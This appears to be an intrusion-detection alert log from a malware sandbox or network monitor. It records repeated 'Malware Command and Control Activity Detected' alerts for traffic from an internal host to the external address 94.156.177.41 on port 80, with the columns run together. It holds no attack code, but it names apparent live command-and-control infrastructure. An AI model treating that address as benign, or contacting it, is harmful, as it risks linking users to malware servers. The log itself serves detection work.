              2025-01-11T07:46:08.138322+010020253811Malware Command and Control Activity Detected192.168.2.55009294.156.177.4180TCP
              2025-01-11T07:46:09.033339+010020253811Malware Command and Control Activity Detected192.168.2.55009394.156.177.4180TCP
              2025-01-11T07:46:09.910608+010020253811Malware Command and Control Activity Detected192.168.2.55009494.156.177.4180TCP
              2025-01-11T07:46:10.798044+010020253811Malware Command and Control Activity Detected192.168.2.55009594.156.177.4180TCP
              2025-01-11T07:46:11.690985+010020253811Malware Command and Control Activity Detected192.168.2.55009694.156.177.4180TCP
              2025-01-11T07:46:12.563647+010020253811Malware Command and Control Activity Detected192.168.2.55009794.156.177.4180TCP
              2025-01-11T07:46:13.437852+010020253811Malware Command and Control Activity Detected192.168.2.55009894.156.177.4180TCP
              2025-01-11T07:46:14.311717+010020253811Malware Command and Control Activity Detected192.168.2.55009994.156.177.4180TCP
              2025-01-11T07:46:15.196451+010020253811Malware Command and Control Activity Detected192.168.2.55010094.156.177.4180TCP
              2025-01-11T07:46:16.066977+010020253811Malware Command and Control Activity Detected192.168.2.55010194.156.177.4180TCP
              2025-01-11T07:46:16.947180+010020253811Malware Command and Control Activity Detected192.168.2.55010294.156.177.4180TCP
              2025-01-11T07:46:17.795814+010020253811Malware Command and Control Activity Detected192.168.2.55010394.156.177.4180TCP
              2025-01-11T07:46:18.795869+010020253811Malware Command and Control Activity Detected192.168.2.55010494.156.177.4180TCP
              2025-01-11T07:46:19.678030+010020253811Malware Command and Control Activity Detected192.168.2.55010594.156.177.4180TCP
              2025-01-11T07:46:20.545406+010020253811Malware Command and Control Activity Detected192.168.2.55010694.156.177.4180TCP
              2025-01-11T07:46:21.450794+010020253811Malware Command and Control Activity Detected192.168.2.55010794.156.177.4180TCP
              2025-01-11T07:46:22.498284+010020253811Malware Command and Control Activity Detected192.168.2.55010894.156.177.4180TCP
              2025-01-11T07:46:23.372578+010020253811Malware Command and Control Activity Detected192.168.2.55010994.156.177.4180TCP
              2025-01-11T07:46:24.220617+010020253811Malware Command and Control Activity Detected192.168.2.55011094.156.177.4180TCP
              2025-01-11T07:46:25.095420+010020253811Malware Command and Control Activity Detected192.168.2.55011194.156.177.4180TCP
              2025-01-11T07:46:25.958653+010020253811Malware Command and Control Activity Detected192.168.2.55011294.156.177.4180TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T07:44:28.030760+010020243131Malware Command and Control Activity Detected192.168.2.54970994.156.177.4180TCP
              2025-01-11T07:44:28.931958+010020243131Malware Command and Control Activity Detected192.168.2.54971194.156.177.4180TCP
              2025-01-11T07:44:29.967134+010020243131Malware Command and Control Activity Detected192.168.2.54971394.156.177.4180TCP
              2025-01-11T07:44:30.851513+010020243131Malware Command and Control Activity Detected192.168.2.54971494.156.177.4180TCP
              2025-01-11T07:44:31.718507+010020243131Malware Command and Control Activity Detected192.168.2.54971594.156.177.4180TCP
              2025-01-11T07:44:33.640345+010020243131Malware Command and Control Activity Detected192.168.2.54971694.156.177.4180TCP
              2025-01-11T07:44:34.512627+010020243131Malware Command and Control Activity Detected192.168.2.54971794.156.177.4180TCP
              2025-01-11T07:44:35.396140+010020243131Malware Command and Control Activity Detected192.168.2.54971894.156.177.4180TCP
              2025-01-11T07:44:36.266782+010020243131Malware Command and Control Activity Detected192.168.2.54971994.156.177.4180TCP
              2025-01-11T07:44:37.189451+010020243131Malware Command and Control Activity Detected192.168.2.54972094.156.177.4180TCP
              2025-01-11T07:44:38.297474+010020243131Malware Command and Control Activity Detected192.168.2.54972194.156.177.4180TCP
              2025-01-11T07:44:39.175539+010020243131Malware Command and Control Activity Detected192.168.2.54972294.156.177.4180TCP
              2025-01-11T07:44:40.083235+010020243131Malware Command and Control Activity Detected192.168.2.54972494.156.177.4180TCP
              2025-01-11T07:44:41.166479+010020243131Malware Command and Control Activity Detected192.168.2.54972594.156.177.4180TCP
              2025-01-11T07:44:42.037120+010020243131Malware Command and Control Activity Detected192.168.2.54973094.156.177.4180TCP
              2025-01-11T07:44:42.934004+010020243131Malware Command and Control Activity Detected192.168.2.54973894.156.177.4180TCP
              2025-01-11T07:44:43.818626+010020243131Malware Command and Control Activity Detected192.168.2.54974394.156.177.4180TCP
              2025-01-11T07:44:44.687247+010020243131Malware Command and Control Activity Detected192.168.2.54974994.156.177.4180TCP
              2025-01-11T07:44:45.559460+010020243131Malware Command and Control Activity Detected192.168.2.54975594.156.177.4180TCP
              2025-01-11T07:44:46.454393+010020243131Malware Command and Control Activity Detected192.168.2.54976194.156.177.4180TCP
              2025-01-11T07:44:47.315113+010020243131Malware Command and Control Activity Detected192.168.2.54977194.156.177.4180TCP
              2025-01-11T07:44:48.186037+010020243131Malware Command and Control Activity Detected192.168.2.54977794.156.177.4180TCP
              2025-01-11T07:44:49.200455+010020243131Malware Command and Control Activity Detected192.168.2.54978494.156.177.4180TCP
              2025-01-11T07:44:50.072387+010020243131Malware Command and Control Activity Detected192.168.2.54979094.156.177.4180TCP
              2025-01-11T07:44:51.077306+010020243131Malware Command and Control Activity Detected192.168.2.54979694.156.177.4180TCP
              2025-01-11T07:44:51.942413+010020243131Malware Command and Control Activity Detected192.168.2.54980494.156.177.4180TCP
              2025-01-11T07:44:52.835032+010020243131Malware Command and Control Activity Detected192.168.2.54981194.156.177.4180TCP
              2025-01-11T07:44:53.762221+010020243131Malware Command and Control Activity Detected192.168.2.54981694.156.177.4180TCP
              2025-01-11T07:44:54.673111+010020243131Malware Command and Control Activity Detected192.168.2.54982194.156.177.4180TCP
              2025-01-11T07:44:55.536663+010020243131Malware Command and Control Activity Detected192.168.2.54982694.156.177.4180TCP
              2025-01-11T07:44:56.429080+010020243131Malware Command and Control Activity Detected192.168.2.54983494.156.177.4180TCP
              2025-01-11T07:44:57.288262+010020243131Malware Command and Control Activity Detected192.168.2.54984094.156.177.4180TCP
              2025-01-11T07:44:58.144593+010020243131Malware Command and Control Activity Detected192.168.2.54984994.156.177.4180TCP
              2025-01-11T07:44:59.022080+010020243131Malware Command and Control Activity Detected192.168.2.54985594.156.177.4180TCP
              2025-01-11T07:45:00.217467+010020243131Malware Command and Control Activity Detected192.168.2.54986294.156.177.4180TCP
              2025-01-11T07:45:01.091724+010020243131Malware Command and Control Activity Detected192.168.2.54986994.156.177.4180TCP
              2025-01-11T07:45:01.958700+010020243131Malware Command and Control Activity Detected192.168.2.54987894.156.177.4180TCP
              2025-01-11T07:45:03.172234+010020243131Malware Command and Control Activity Detected192.168.2.54988494.156.177.4180TCP
              2025-01-11T07:45:04.029029+010020243131Malware Command and Control Activity Detected192.168.2.54989194.156.177.4180TCP
              2025-01-11T07:45:04.919494+010020243131Malware Command and Control Activity Detected192.168.2.54989994.156.177.4180TCP
              2025-01-11T07:45:05.802703+010020243131Malware Command and Control Activity Detected192.168.2.54990594.156.177.4180TCP
              2025-01-11T07:45:06.809719+010020243131Malware Command and Control Activity Detected192.168.2.54991194.156.177.4180TCP
              2025-01-11T07:45:07.882275+010020243131Malware Command and Control Activity Detected192.168.2.54991994.156.177.4180TCP
              2025-01-11T07:45:08.745796+010020243131Malware Command and Control Activity Detected192.168.2.54992894.156.177.4180TCP
              2025-01-11T07:45:09.642873+010020243131Malware Command and Control Activity Detected192.168.2.54993494.156.177.4180TCP
              2025-01-11T07:45:10.652685+010020243131Malware Command and Control Activity Detected192.168.2.54993994.156.177.4180TCP
              2025-01-11T07:45:11.552968+010020243131Malware Command and Control Activity Detected192.168.2.54994594.156.177.4180TCP
              2025-01-11T07:45:12.418770+010020243131Malware Command and Control Activity Detected192.168.2.54995394.156.177.4180TCP
              2025-01-11T07:45:13.284283+010020243131Malware Command and Control Activity Detected192.168.2.54996194.156.177.4180TCP
              2025-01-11T07:45:14.187829+010020243131Malware Command and Control Activity Detected192.168.2.54996894.156.177.4180TCP
              2025-01-11T07:45:15.050986+010020243131Malware Command and Control Activity Detected192.168.2.54997494.156.177.4180TCP
              2025-01-11T07:45:15.918385+010020243131Malware Command and Control Activity Detected192.168.2.54998094.156.177.4180TCP
              2025-01-11T07:45:16.804729+010020243131Malware Command and Control Activity Detected192.168.2.54998694.156.177.4180TCP
              2025-01-11T07:45:17.675448+010020243131Malware Command and Control Activity Detected192.168.2.54999394.156.177.4180TCP
              2025-01-11T07:45:18.537448+010020243131Malware Command and Control Activity Detected192.168.2.55000294.156.177.4180TCP
              2025-01-11T07:45:19.654529+010020243131Malware Command and Control Activity Detected192.168.2.55001094.156.177.4180TCP
              2025-01-11T07:45:20.537471+010020243131Malware Command and Control Activity Detected192.168.2.55001694.156.177.4180TCP
              2025-01-11T07:45:21.400480+010020243131Malware Command and Control Activity Detected192.168.2.55002294.156.177.4180TCP
              2025-01-11T07:45:22.637453+010020243131Malware Command and Control Activity Detected192.168.2.55002794.156.177.4180TCP
              2025-01-11T07:45:23.500259+010020243131Malware Command and Control Activity Detected192.168.2.55003794.156.177.4180TCP
              2025-01-11T07:45:24.391600+010020243131Malware Command and Control Activity Detected192.168.2.55004394.156.177.4180TCP
              2025-01-11T07:45:25.387120+010020243131Malware Command and Control Activity Detected192.168.2.55004494.156.177.4180TCP
              2025-01-11T07:45:26.266552+010020243131Malware Command and Control Activity Detected192.168.2.55004594.156.177.4180TCP
              2025-01-11T07:45:27.122844+010020243131Malware Command and Control Activity Detected192.168.2.55004694.156.177.4180TCP
              2025-01-11T07:45:28.215382+010020243131Malware Command and Control Activity Detected192.168.2.55004794.156.177.4180TCP
              2025-01-11T07:45:29.109982+010020243131Malware Command and Control Activity Detected192.168.2.55004894.156.177.4180TCP
              2025-01-11T07:45:29.977511+010020243131Malware Command and Control Activity Detected192.168.2.55004994.156.177.4180TCP
              2025-01-11T07:45:30.838290+010020243131Malware Command and Control Activity Detected192.168.2.55005094.156.177.4180TCP
              2025-01-11T07:45:31.709287+010020243131Malware Command and Control Activity Detected192.168.2.55005194.156.177.4180TCP
              2025-01-11T07:45:32.579246+010020243131Malware Command and Control Activity Detected192.168.2.55005294.156.177.4180TCP
              2025-01-11T07:45:33.462401+010020243131Malware Command and Control Activity Detected192.168.2.55005394.156.177.4180TCP
              2025-01-11T07:45:34.323221+010020243131Malware Command and Control Activity Detected192.168.2.55005494.156.177.4180TCP
              2025-01-11T07:45:35.186639+010020243131Malware Command and Control Activity Detected192.168.2.55005594.156.177.4180TCP
              2025-01-11T07:45:36.073409+010020243131Malware Command and Control Activity Detected192.168.2.55005694.156.177.4180TCP
              2025-01-11T07:45:37.239895+010020243131Malware Command and Control Activity Detected192.168.2.55005794.156.177.4180TCP
              2025-01-11T07:45:38.251440+010020243131Malware Command and Control Activity Detected192.168.2.55005894.156.177.4180TCP
              2025-01-11T07:45:39.138394+010020243131Malware Command and Control Activity Detected192.168.2.55005994.156.177.4180TCP
              2025-01-11T07:45:40.007540+010020243131Malware Command and Control Activity Detected192.168.2.55006094.156.177.4180TCP
              2025-01-11T07:45:40.857097+010020243131Malware Command and Control Activity Detected192.168.2.55006194.156.177.4180TCP
              2025-01-11T07:45:41.732826+010020243131Malware Command and Control Activity Detected192.168.2.55006294.156.177.4180TCP
              2025-01-11T07:45:42.753857+010020243131Malware Command and Control Activity Detected192.168.2.55006394.156.177.4180TCP
              2025-01-11T07:45:43.607936+010020243131Malware Command and Control Activity Detected192.168.2.55006494.156.177.4180TCP
              2025-01-11T07:45:44.450980+010020243131Malware Command and Control Activity Detected192.168.2.55006594.156.177.4180TCP
              2025-01-11T07:45:45.428851+010020243131Malware Command and Control Activity Detected192.168.2.55006694.156.177.4180TCP
              2025-01-11T07:45:46.295558+010020243131Malware Command and Control Activity Detected192.168.2.55006794.156.177.4180TCP
              2025-01-11T07:45:47.180099+010020243131Malware Command and Control Activity Detected192.168.2.55006894.156.177.4180TCP
              2025-01-11T07:45:48.062041+010020243131Malware Command and Control Activity Detected192.168.2.55006994.156.177.4180TCP
              2025-01-11T07:45:48.926425+010020243131Malware Command and Control Activity Detected192.168.2.55007094.156.177.4180TCP
              2025-01-11T07:45:49.824114+010020243131Malware Command and Control Activity Detected192.168.2.55007194.156.177.4180TCP
              2025-01-11T07:45:50.734862+010020243131Malware Command and Control Activity Detected192.168.2.55007294.156.177.4180TCP
              2025-01-11T07:45:51.619631+010020243131Malware Command and Control Activity Detected192.168.2.55007394.156.177.4180TCP
              2025-01-11T07:45:52.455714+010020243131Malware Command and Control Activity Detected192.168.2.55007494.156.177.4180TCP
              2025-01-11T07:45:53.300650+010020243131Malware Command and Control Activity Detected192.168.2.55007594.156.177.4180TCP
              2025-01-11T07:45:54.576109+010020243131Malware Command and Control Activity Detected192.168.2.55007694.156.177.4180TCP
              2025-01-11T07:45:55.483384+010020243131Malware Command and Control Activity Detected192.168.2.55007794.156.177.4180TCP
              2025-01-11T07:45:56.355282+010020243131Malware Command and Control Activity Detected192.168.2.55007894.156.177.4180TCP
              2025-01-11T07:45:57.212131+010020243131Malware Command and Control Activity Detected192.168.2.55007994.156.177.4180TCP
              2025-01-11T07:45:58.216432+010020243131Malware Command and Control Activity Detected192.168.2.55008094.156.177.4180TCP
              2025-01-11T07:45:59.120917+010020243131Malware Command and Control Activity Detected192.168.2.55008194.156.177.4180TCP
              2025-01-11T07:45:59.986914+010020243131Malware Command and Control Activity Detected192.168.2.55008294.156.177.4180TCP
              2025-01-11T07:46:00.838213+010020243131Malware Command and Control Activity Detected192.168.2.55008394.156.177.4180TCP
              2025-01-11T07:46:01.716963+010020243131Malware Command and Control Activity Detected192.168.2.55008494.156.177.4180TCP
              2025-01-11T07:46:02.579117+010020243131Malware Command and Control Activity Detected192.168.2.55008594.156.177.4180TCP
              2025-01-11T07:46:03.569616+010020243131Malware Command and Control Activity Detected192.168.2.55008694.156.177.4180TCP
              2025-01-11T07:46:04.429247+010020243131Malware Command and Control Activity Detected192.168.2.55008794.156.177.4180TCP
              2025-01-11T07:46:05.309228+010020243131Malware Command and Control Activity Detected192.168.2.55008894.156.177.4180TCP
              2025-01-11T07:46:06.196145+010020243131Malware Command and Control Activity Detected192.168.2.55008994.156.177.4180TCP
              2025-01-11T07:46:07.103223+010020243131Malware Command and Control Activity Detected192.168.2.55009094.156.177.4180TCP
              2025-01-11T07:46:07.967380+010020243131Malware Command and Control Activity Detected192.168.2.55009194.156.177.4180TCP
              2025-01-11T07:46:08.856365+010020243131Malware Command and Control Activity Detected192.168.2.55009294.156.177.4180TCP
              2025-01-11T07:46:09.756222+010020243131Malware Command and Control Activity Detected192.168.2.55009394.156.177.4180TCP
              2025-01-11T07:46:10.621993+010020243131Malware Command and Control Activity Detected192.168.2.55009494.156.177.4180TCP
              2025-01-11T07:46:11.520963+010020243131Malware Command and Control Activity Detected192.168.2.55009594.156.177.4180TCP
              2025-01-11T07:46:12.414303+010020243131Malware Command and Control Activity Detected192.168.2.55009694.156.177.4180TCP
              2025-01-11T07:46:13.286242+010020243131Malware Command and Control Activity Detected192.168.2.55009794.156.177.4180TCP
              2025-01-11T07:46:14.163375+010020243131Malware Command and Control Activity Detected192.168.2.55009894.156.177.4180TCP
              2025-01-11T07:46:15.040084+010020243131Malware Command and Control Activity Detected192.168.2.55009994.156.177.4180TCP
              2025-01-11T07:46:15.899908+010020243131Malware Command and Control Activity Detected192.168.2.55010094.156.177.4180TCP
              2025-01-11T07:46:16.788672+010020243131Malware Command and Control Activity Detected192.168.2.55010194.156.177.4180TCP
              2025-01-11T07:46:17.639411+010020243131Malware Command and Control Activity Detected192.168.2.55010294.156.177.4180TCP
              2025-01-11T07:46:18.636150+010020243131Malware Command and Control Activity Detected192.168.2.55010394.156.177.4180TCP
              2025-01-11T07:46:19.502502+010020243131Malware Command and Control Activity Detected192.168.2.55010494.156.177.4180TCP
              2025-01-11T07:46:20.387384+010020243131Malware Command and Control Activity Detected192.168.2.55010594.156.177.4180TCP
              2025-01-11T07:46:21.299723+010020243131Malware Command and Control Activity Detected192.168.2.55010694.156.177.4180TCP
              2025-01-11T07:46:22.345032+010020243131Malware Command and Control Activity Detected192.168.2.55010794.156.177.4180TCP
              2025-01-11T07:46:23.228495+010020243131Malware Command and Control Activity Detected192.168.2.55010894.156.177.4180TCP
              2025-01-11T07:46:24.079217+010020243131Malware Command and Control Activity Detected192.168.2.55010994.156.177.4180TCP
              2025-01-11T07:46:24.943363+010020243131Malware Command and Control Activity Detected192.168.2.55011094.156.177.4180TCP
              2025-01-11T07:46:25.812030+010020243131Malware Command and Control Activity Detected192.168.2.55011194.156.177.4180TCP
              2025-01-11T07:46:26.689397+010020243131Malware Command and Control Activity Detected192.168.2.55011294.156.177.4180TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T07:44:28.030760+010020243181Malware Command and Control Activity Detected192.168.2.54970994.156.177.4180TCP
              2025-01-11T07:44:28.931958+010020243181Malware Command and Control Activity Detected192.168.2.54971194.156.177.4180TCP
              2025-01-11T07:44:29.967134+010020243181Malware Command and Control Activity Detected192.168.2.54971394.156.177.4180TCP
              2025-01-11T07:44:30.851513+010020243181Malware Command and Control Activity Detected192.168.2.54971494.156.177.4180TCP
              2025-01-11T07:44:31.718507+010020243181Malware Command and Control Activity Detected192.168.2.54971594.156.177.4180TCP
              2025-01-11T07:44:33.640345+010020243181Malware Command and Control Activity Detected192.168.2.54971694.156.177.4180TCP
              2025-01-11T07:44:34.512627+010020243181Malware Command and Control Activity Detected192.168.2.54971794.156.177.4180TCP
              2025-01-11T07:44:35.396140+010020243181Malware Command and Control Activity Detected192.168.2.54971894.156.177.4180TCP
              2025-01-11T07:44:36.266782+010020243181Malware Command and Control Activity Detected192.168.2.54971994.156.177.4180TCP
              2025-01-11T07:44:37.189451+010020243181Malware Command and Control Activity Detected192.168.2.54972094.156.177.4180TCP
              2025-01-11T07:44:38.297474+010020243181Malware Command and Control Activity Detected192.168.2.54972194.156.177.4180TCP
              2025-01-11T07:44:39.175539+010020243181Malware Command and Control Activity Detected192.168.2.54972294.156.177.4180TCP
              2025-01-11T07:44:40.083235+010020243181Malware Command and Control Activity Detected192.168.2.54972494.156.177.4180TCP
              2025-01-11T07:44:41.166479+010020243181Malware Command and Control Activity Detected192.168.2.54972594.156.177.4180TCP
              2025-01-11T07:44:42.037120+010020243181Malware Command and Control Activity Detected192.168.2.54973094.156.177.4180TCP
              2025-01-11T07:44:42.934004+010020243181Malware Command and Control Activity Detected192.168.2.54973894.156.177.4180TCP
              2025-01-11T07:44:43.818626+010020243181Malware Command and Control Activity Detected192.168.2.54974394.156.177.4180TCP
              2025-01-11T07:44:44.687247+010020243181Malware Command and Control Activity Detected192.168.2.54974994.156.177.4180TCP
              2025-01-11T07:44:45.559460+010020243181Malware Command and Control Activity Detected192.168.2.54975594.156.177.4180TCP
              2025-01-11T07:44:46.454393+010020243181Malware Command and Control Activity Detected192.168.2.54976194.156.177.4180TCP
              2025-01-11T07:44:47.315113+010020243181Malware Command and Control Activity Detected192.168.2.54977194.156.177.4180TCP
              2025-01-11T07:44:48.186037+010020243181Malware Command and Control Activity Detected192.168.2.54977794.156.177.4180TCP
              2025-01-11T07:44:49.200455+010020243181Malware Command and Control Activity Detected192.168.2.54978494.156.177.4180TCP
              2025-01-11T07:44:50.072387+010020243181Malware Command and Control Activity Detected192.168.2.54979094.156.177.4180TCP
              2025-01-11T07:44:51.077306+010020243181Malware Command and Control Activity Detected192.168.2.54979694.156.177.4180TCP
              2025-01-11T07:44:51.942413+010020243181Malware Command and Control Activity Detected192.168.2.54980494.156.177.4180TCP
              2025-01-11T07:44:52.835032+010020243181Malware Command and Control Activity Detected192.168.2.54981194.156.177.4180TCP
              2025-01-11T07:44:53.762221+010020243181Malware Command and Control Activity Detected192.168.2.54981694.156.177.4180TCP
              2025-01-11T07:44:54.673111+010020243181Malware Command and Control Activity Detected192.168.2.54982194.156.177.4180TCP
              2025-01-11T07:44:55.536663+010020243181Malware Command and Control Activity Detected192.168.2.54982694.156.177.4180TCP
              2025-01-11T07:44:56.429080+010020243181Malware Command and Control Activity Detected192.168.2.54983494.156.177.4180TCP
              2025-01-11T07:44:57.288262+010020243181Malware Command and Control Activity Detected192.168.2.54984094.156.177.4180TCP
              2025-01-11T07:44:58.144593+010020243181Malware Command and Control Activity Detected192.168.2.54984994.156.177.4180TCP
              2025-01-11T07:44:59.022080+010020243181Malware Command and Control Activity Detected192.168.2.54985594.156.177.4180TCP
              2025-01-11T07:45:00.217467+010020243181Malware Command and Control Activity Detected192.168.2.54986294.156.177.4180TCP
              2025-01-11T07:45:01.091724+010020243181Malware Command and Control Activity Detected192.168.2.54986994.156.177.4180TCP
              2025-01-11T07:45:01.958700+010020243181Malware Command and Control Activity Detected192.168.2.54987894.156.177.4180TCP
              2025-01-11T07:45:03.172234+010020243181Malware Command and Control Activity Detected192.168.2.54988494.156.177.4180TCP
              2025-01-11T07:45:04.029029+010020243181Malware Command and Control Activity Detected192.168.2.54989194.156.177.4180TCP
              2025-01-11T07:45:04.919494+010020243181Malware Command and Control Activity Detected192.168.2.54989994.156.177.4180TCP
              2025-01-11T07:45:05.802703+010020243181Malware Command and Control Activity Detected192.168.2.54990594.156.177.4180TCP
              2025-01-11T07:45:06.809719+010020243181Malware Command and Control Activity Detected192.168.2.54991194.156.177.4180TCP
              2025-01-11T07:45:07.882275+010020243181Malware Command and Control Activity Detected192.168.2.54991994.156.177.4180TCP
              2025-01-11T07:45:08.745796+010020243181Malware Command and Control Activity Detected192.168.2.54992894.156.177.4180TCP
              2025-01-11T07:45:09.642873+010020243181Malware Command and Control Activity Detected192.168.2.54993494.156.177.4180TCP
              2025-01-11T07:45:10.652685+010020243181Malware Command and Control Activity Detected192.168.2.54993994.156.177.4180TCP
              2025-01-11T07:45:11.552968+010020243181Malware Command and Control Activity Detected192.168.2.54994594.156.177.4180TCP
              2025-01-11T07:45:12.418770+010020243181Malware Command and Control Activity Detected192.168.2.54995394.156.177.4180TCP
              2025-01-11T07:45:13.284283+010020243181Malware Command and Control Activity Detected192.168.2.54996194.156.177.4180TCP
              2025-01-11T07:45:14.187829+010020243181Malware Command and Control Activity Detected192.168.2.54996894.156.177.4180TCP
              2025-01-11T07:45:15.050986+010020243181Malware Command and Control Activity Detected192.168.2.54997494.156.177.4180TCP
              2025-01-11T07:45:15.918385+010020243181Malware Command and Control Activity Detected192.168.2.54998094.156.177.4180TCP
              2025-01-11T07:45:16.804729+010020243181Malware Command and Control Activity Detected192.168.2.54998694.156.177.4180TCP
              2025-01-11T07:45:17.675448+010020243181Malware Command and Control Activity Detected192.168.2.54999394.156.177.4180TCP
              2025-01-11T07:45:18.537448+010020243181Malware Command and Control Activity Detected192.168.2.55000294.156.177.4180TCP
              2025-01-11T07:45:19.654529+010020243181Malware Command and Control Activity Detected192.168.2.55001094.156.177.4180TCP
              2025-01-11T07:45:20.537471+010020243181Malware Command and Control Activity Detected192.168.2.55001694.156.177.4180TCP
              2025-01-11T07:45:21.400480+010020243181Malware Command and Control Activity Detected192.168.2.55002294.156.177.4180TCP
              2025-01-11T07:45:22.637453+010020243181Malware Command and Control Activity Detected192.168.2.55002794.156.177.4180TCP
              2025-01-11T07:45:23.500259+010020243181Malware Command and Control Activity Detected192.168.2.55003794.156.177.4180TCP
              2025-01-11T07:45:24.391600+010020243181Malware Command and Control Activity Detected192.168.2.55004394.156.177.4180TCP
              2025-01-11T07:45:25.387120+010020243181Malware Command and Control Activity Detected192.168.2.55004494.156.177.4180TCP
              2025-01-11T07:45:26.266552+010020243181Malware Command and Control Activity Detected192.168.2.55004594.156.177.4180TCP
              2025-01-11T07:45:27.122844+010020243181Malware Command and Control Activity Detected192.168.2.55004694.156.177.4180TCP
              2025-01-11T07:45:28.215382+010020243181Malware Command and Control Activity Detected192.168.2.55004794.156.177.4180TCP
              2025-01-11T07:45:29.109982+010020243181Malware Command and Control Activity Detected192.168.2.55004894.156.177.4180TCP
              2025-01-11T07:45:29.977511+010020243181Malware Command and Control Activity Detected192.168.2.55004994.156.177.4180TCP
              2025-01-11T07:45:30.838290+010020243181Malware Command and Control Activity Detected192.168.2.55005094.156.177.4180TCP
              2025-01-11T07:45:31.709287+010020243181Malware Command and Control Activity Detected192.168.2.55005194.156.177.4180TCP
              2025-01-11T07:45:32.579246+010020243181Malware Command and Control Activity Detected192.168.2.55005294.156.177.4180TCP
              2025-01-11T07:45:33.462401+010020243181Malware Command and Control Activity Detected192.168.2.55005394.156.177.4180TCP
              2025-01-11T07:45:34.323221+010020243181Malware Command and Control Activity Detected192.168.2.55005494.156.177.4180TCP
              2025-01-11T07:45:35.186639+010020243181Malware Command and Control Activity Detected192.168.2.55005594.156.177.4180TCP
              2025-01-11T07:45:36.073409+010020243181Malware Command and Control Activity Detected192.168.2.55005694.156.177.4180TCP
              2025-01-11T07:45:37.239895+010020243181Malware Command and Control Activity Detected192.168.2.55005794.156.177.4180TCP
              2025-01-11T07:45:38.251440+010020243181Malware Command and Control Activity Detected192.168.2.55005894.156.177.4180TCP
              2025-01-11T07:45:39.138394+010020243181Malware Command and Control Activity Detected192.168.2.55005994.156.177.4180TCP
              2025-01-11T07:45:40.007540+010020243181Malware Command and Control Activity Detected192.168.2.55006094.156.177.4180TCP
              2025-01-11T07:45:40.857097+010020243181Malware Command and Control Activity Detected192.168.2.55006194.156.177.4180TCP
              2025-01-11T07:45:41.732826+010020243181Malware Command and Control Activity Detected192.168.2.55006294.156.177.4180TCP
              2025-01-11T07:45:42.753857+010020243181Malware Command and Control Activity Detected192.168.2.55006394.156.177.4180TCP
              2025-01-11T07:45:43.607936+010020243181Malware Command and Control Activity Detected192.168.2.55006494.156.177.4180TCP
              2025-01-11T07:45:44.450980+010020243181Malware Command and Control Activity Detected192.168.2.55006594.156.177.4180TCP
              2025-01-11T07:45:45.428851+010020243181Malware Command and Control Activity Detected192.168.2.55006694.156.177.4180TCP
              2025-01-11T07:45:46.295558+010020243181Malware Command and Control Activity Detected192.168.2.55006794.156.177.4180TCP
              2025-01-11T07:45:47.180099+010020243181Malware Command and Control Activity Detected192.168.2.55006894.156.177.4180TCP
              2025-01-11T07:45:48.062041+010020243181Malware Command and Control Activity Detected192.168.2.55006994.156.177.4180TCP
              2025-01-11T07:45:48.926425+010020243181Malware Command and Control Activity Detected192.168.2.55007094.156.177.4180TCP
              2025-01-11T07:45:49.824114+010020243181Malware Command and Control Activity Detected192.168.2.55007194.156.177.4180TCP
              2025-01-11T07:45:50.734862+010020243181Malware Command and Control Activity Detected192.168.2.55007294.156.177.4180TCP
              2025-01-11T07:45:51.619631+010020243181Malware Command and Control Activity Detected192.168.2.55007394.156.177.4180TCP
              2025-01-11T07:45:52.455714+010020243181Malware Command and Control Activity Detected192.168.2.55007494.156.177.4180TCP
              2025-01-11T07:45:53.300650+010020243181Malware Command and Control Activity Detected192.168.2.55007594.156.177.4180TCP
              2025-01-11T07:45:54.576109+010020243181Malware Command and Control Activity Detected192.168.2.55007694.156.177.4180TCP
              2025-01-11T07:45:55.483384+010020243181Malware Command and Control Activity Detected192.168.2.55007794.156.177.4180TCP
              2025-01-11T07:45:56.355282+010020243181Malware Command and Control Activity Detected192.168.2.55007894.156.177.4180TCP
              2025-01-11T07:45:57.212131+010020243181Malware Command and Control Activity Detected192.168.2.55007994.156.177.4180TCP
              2025-01-11T07:45:58.216432+010020243181Malware Command and Control Activity Detected192.168.2.55008094.156.177.4180TCP
              2025-01-11T07:45:59.120917+010020243181Malware Command and Control Activity Detected192.168.2.55008194.156.177.4180TCP
              2025-01-11T07:45:59.986914+010020243181Malware Command and Control Activity Detected192.168.2.55008294.156.177.4180TCP
              2025-01-11T07:46:00.838213+010020243181Malware Command and Control Activity Detected192.168.2.55008394.156.177.4180TCP
              2025-01-11T07:46:01.716963+010020243181Malware Command and Control Activity Detected192.168.2.55008494.156.177.4180TCP
              2025-01-11T07:46:02.579117+010020243181Malware Command and Control Activity Detected192.168.2.55008594.156.177.4180TCP
              2025-01-11T07:46:03.569616+010020243181Malware Command and Control Activity Detected192.168.2.55008694.156.177.4180TCP
              2025-01-11T07:46:04.429247+010020243181Malware Command and Control Activity Detected192.168.2.55008794.156.177.4180TCP
              2025-01-11T07:46:05.309228+010020243181Malware Command and Control Activity Detected192.168.2.55008894.156.177.4180TCP
              2025-01-11T07:46:06.196145+010020243181Malware Command and Control Activity Detected192.168.2.55008994.156.177.4180TCP
              2025-01-11T07:46:07.103223+010020243181Malware Command and Control Activity Detected192.168.2.55009094.156.177.4180TCP
              2025-01-11T07:46:07.967380+010020243181Malware Command and Control Activity Detected192.168.2.55009194.156.177.4180TCP
              2025-01-11T07:46:08.856365+010020243181Malware Command and Control Activity Detected192.168.2.55009294.156.177.4180TCP
              2025-01-11T07:46:09.756222+010020243181Malware Command and Control Activity Detected192.168.2.55009394.156.177.4180TCP
              2025-01-11T07:46:10.621993+010020243181Malware Command and Control Activity Detected192.168.2.55009494.156.177.4180TCP
              2025-01-11T07:46:11.520963+010020243181Malware Command and Control Activity Detected192.168.2.55009594.156.177.4180TCP
              2025-01-11T07:46:12.414303+010020243181Malware Command and Control Activity Detected192.168.2.55009694.156.177.4180TCP
              2025-01-11T07:46:13.286242+010020243181Malware Command and Control Activity Detected192.168.2.55009794.156.177.4180TCP
              2025-01-11T07:46:14.163375+010020243181Malware Command and Control Activity Detected192.168.2.55009894.156.177.4180TCP
              2025-01-11T07:46:15.040084+010020243181Malware Command and Control Activity Detected192.168.2.55009994.156.177.4180TCP
              2025-01-11T07:46:15.899908+010020243181Malware Command and Control Activity Detected192.168.2.55010094.156.177.4180TCP
              2025-01-11T07:46:16.788672+010020243181Malware Command and Control Activity Detected192.168.2.55010194.156.177.4180TCP
              2025-01-11T07:46:17.639411+010020243181Malware Command and Control Activity Detected192.168.2.55010294.156.177.4180TCP
